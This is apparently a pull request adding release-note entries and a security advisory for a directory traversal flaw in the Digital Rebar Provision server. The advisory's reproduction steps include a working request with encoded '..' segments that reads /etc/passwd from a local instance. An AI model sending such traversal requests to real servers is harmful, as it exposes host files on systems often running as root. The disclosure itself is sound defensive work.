### PR TITLE
doc(provision-server): document cve20200924a

### DIFF
--- a/doc/rel_notes/summaries/release_v42.rst
+++ b/doc/rel_notes/summaries/release_v42.rst
@@ -23,6 +23,16 @@ Note: since the v4.3 release included major architectural work and required more
 
 See :ref:`rs_release_summaries` for a complete list of all releases.
 
+Important Notices
+~~~~~~~~~~~~~~~~~
+
+Vulnerabilities
++++++++++++++++
+
+The following vulnerabilities were reported and fixed this release.  See the CVE for which releases contain the fix.
+
+* :ref:`rs_cve_20200924a`
+
 .. _rs_release_v42_otheritems:
 
 Items of Note

--- a/doc/rel_notes/summaries/release_v43.rst
+++ b/doc/rel_notes/summaries/release_v43.rst
@@ -23,6 +23,17 @@ In addition to bug fixes and performance improvements, the release includes seve
 
 See :ref:`rs_release_summaries` for a complete list of all releases.
 
+Important Notices
+~~~~~~~~~~~~~~~~~
+
+Vulnerabilities
++++++++++++++++
+
+The following vulnerabilities were reported and fixed this release.  See the CVE for which releases contain the fix.
+
+* :ref:`rs_cve_20200924a`
+
+
 .. _rs_release_v43_ha:
 
 High Availability

--- a/doc/rel_notes/summaries/release_v44.rst
+++ b/doc/rel_notes/summaries/release_v44.rst
@@ -20,6 +20,17 @@ In addition to bug fixes and performance improvements, the release includes seve
 
 See :ref:`rs_release_summaries` for a complete list of all releases.
 
+Important Notices
+~~~~~~~~~~~~~~~~~
+
+Vulnerabilities
++++++++++++++++
+
+The following vulnerabilities were reported and fixed this release.  See the CVE for which releases contain the fix.
+
+* :ref:`rs_cve_20200924a`
+
+
 .. _rs_release_v44_pooling:
 
 Infrastructure Resource Pooling

--- a/doc/rel_notes/summaries/release_v45.rst
+++ b/doc/rel_notes/summaries/release_v45.rst
@@ -21,8 +21,19 @@ See :ref:`rs_release_summaries` for a complete list of all releases.
 
 .. _rs_release_v45_deprecations:
 
+Important Notices
+~~~~~~~~~~~~~~~~~
+
+Vulnerabilities
++++++++++++++++
+
+The following vulnerabilities were reported and fixed this release.  See the CVE for which releases contain the fix.
+
+* :ref:`rs_cve_20200924a`
+
+
 Deprecations
-~~~~~~~~~~~~
+++++++++++++
 
 The following items are flagged as deprecated in v4.5 and will be removed in v4.6.
 
@@ -33,7 +44,7 @@ The following items are flagged as deprecated in v4.5 and will be removed in v4.
 .. _rs_release_v45_removals:
 
 Removals
-~~~~~~~~
+++++++++
 
 None at this time.
 

--- a/doc/rel_notes/summaries/release_v46.rst
+++ b/doc/rel_notes/summaries/release_v46.rst
@@ -19,24 +19,37 @@ In addition to bug fixes and performance improvements, the release includes seve
 
 See :ref:`rs_release_summaries` for a complete list of all releases.
 
+.. _rs_release_v46_notices:
+
+Important Notices
+~~~~~~~~~~~~~~~~~
+
+.. _rs_release_v46_vulns:
+
+Vulnerabilities
++++++++++++++++
+
+The following vulnerabilities were reported
+
+* :ref:`rs_cve_20200924a`
+
 .. _rs_release_v46_deprecations:
 
 Deprecations
-~~~~~~~~~~~~
+++++++++++++
 
-The following items are flagged as deprecated in v4.6 and will be removed in v4.7.
+The following items are flagged as deprecated in v4.5 and will be removed in v4.6.
 
-* none planned.
+* old pattern cluster synchronization with cluster-add, cluster-step and cluster-sync.  Operators should migrate to the new cluster-gate-* patterns.
+* terraform-provider-drp based on the DRP v3 API will not be supported
+
 
 .. _rs_release_v46_removals:
 
 Removals
-~~~~~~~~
+++++++++
 
-The following items were flagged as deprecated in v4.5 and are removed in v4.6.
-
-* old pattern cluster synchronization with cluster-add, cluster-step and cluster-sync.  Operators should migrate to the new cluster-gate-* patterns.
-* terraform-provider-drp based on the DRP v3 API will not be supported
+None at this time.
 
 Universal Workflow
 ~~~~~~~~~~~~~~~~~~

--- a/doc/release.rst
+++ b/doc/release.rst
@@ -10,7 +10,7 @@
 Release Summaries
 -----------------
 
-RackN creates a high level summary for each release that includes the major deliverables, highlights and objectives for the re
+RackN creates a high level summary for each release that includes the major deliverables, highlights and objectives for each release.
 
 .. toctree::
    :maxdepth: 1
@@ -18,6 +18,22 @@ RackN creates a high level summary for each release that includes the major deli
    :reversed:
 
    rel_notes/summaries/*
+
+
+.. _rs_cve:
+
+Common Vulnerabilities and Exposures (CVE)
+------------------------------------------
+
+The following Digital Rebar security issues are being tracked by the RackN team.  Issues are tracked based on the date reported.  Issues are addressed only in the release(s) specified: operators should not assume items are back ported unless explicity indicated.
+
+To report an issue: https://rackn.zendesk.com/hc/en-us/requests/new
+
+.. toctree::
+   :maxdepth: 1
+   :glob:
+
+   security/*
 
 .. _rs_release_strategy:
 

--- a/doc/security/cve_20200924A.rst
+++ b/doc/security/cve_20200924A.rst
@@ -1,0 +1,44 @@
+.. Copyright (c) 2020 RackN Inc.
+.. Licensed under the Apache License, Version 2.0 (the "License");
+.. Digital Rebar Provision documentation under Digital Rebar master license
+.. index::
+  pair: Digital Rebar Provision; Security
+
+.. _rs_cve_20200924a:
+
+CVE 20200924a: Web requests can navigate outside of DRP controlled areas
+========================================================================
+
+DRP server incorrectly respects using `..` for navigation if resulting path is outside of managed areas.  This potentially allowed bad actors to access the host file system.
+
+* Classification: Directory Traversal
+* Reported: Sept 24, 2020
+* Fixed: Sept 24, 2020
+* Addressed In: v4.5, v4.4.7, v4.3.8, v4.2.17
+
+Recommendation
+--------------
+
+Users are advised to apply this patch as soon as possible.   Patching involves replacing the DR-SERVER binary that closes matches the currently deployed version.
+
+
+Mitigation
+----------
+
+Code was added to prevent out of bounds navigation.
+
+Steps to reproduce
+------------------
+
+  :: 
+
+    docker run --rm -it ubuntu /bin/bash
+
+    apt update && apt install -y curl
+    cd /opt
+    mkdir drp ; cd drp
+    curl -fsSL get.rebar.digital/stable | bash -s -- --isolated install
+    ./dr-provision --base-root=`pwd`/drp-data --local-content="" --default-content="" > drp.log 2>&1 &
+    curl -k https://127.0.0.1:8092/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
+
+The above results on the contents of /etc/passwd being shown. This is particularly bad given that this application generally runs as root.


### PR DESCRIPTION
Documents CVE 20200924a: Web requests can navigate outside of DRP controlled areas
========================================================================

DRP server incorrectly respects using `..` for navigation if resulting path is outside of managed areas.  This potentially allowed bad actors to access the host file system.

* Classification: Directory Traversal
* Reported: Sept 24, 2020
* Fixed: Sept 24, 2020
* Addressed In: v4.5, v4.4.7, v4.3.8, v4.2.17

Recommendation
--------------

Users are advised to apply this patch as soon as possible.   Patching involves replacing the DR-SERVER binary that closes matches the currently deployed version.


Mitigation
----------

Code was added to prevent out of bounds navigation.

Steps to reproduce
------------------

  :: 

    docker run --rm -it ubuntu /bin/bash

    apt update && apt install -y curl
    cd /opt
    mkdir drp ; cd drp
    curl -fsSL get.rebar.digital/stable | bash -s -- --isolated install
    ./dr-provision --base-root=`pwd`/drp-data --local-content="" --default-content="" > drp.log 2>&1 &
    curl -k https://127.0.0.1:8092/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

The above results on the contents of /etc/passwd being shown. This is particularly bad given that this application generally runs as root.